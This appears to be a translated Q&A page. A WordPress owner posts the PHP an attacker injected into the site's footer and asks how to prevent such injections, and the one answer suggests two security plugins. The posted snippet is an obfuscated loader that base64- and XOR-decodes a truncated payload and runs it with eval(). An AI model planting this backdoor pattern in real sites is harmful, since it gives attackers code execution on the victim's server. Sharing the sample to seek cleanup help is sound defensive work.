Wordpress php注入黑客

时间:2017-05-18 07:58:16

标签: php wordpress

我的wordpress安装遭到攻击,黑客已经将PHP代码注入我的页脚。

以下是代码:

<?php /* 5pJQhrPh3XJCUOiaQCa6 */ ?><?php
$encoded = "ch0KCh...";
$raw = base64_decode($encoded);
$res = '';
for ($i = 0; $i < strlen($raw); $i++) {
    $res .= chr(ord($raw[$i]) ^ ord('x'));
}
eval($res)
?>
<?php /* uqjsQSyWVhmOHAEVa1i6 */ ?>

我想知道防止这种注射的解决方案吗?我正在运行最新版本的wordpress。

1 个答案:

答案 0 :(得分:0)

可帮助被黑客入侵的Wordpres网站的插件

  • NinjaScanner:检查文件的完整性
  • iThemes安全性:有一个“暴力保护”选项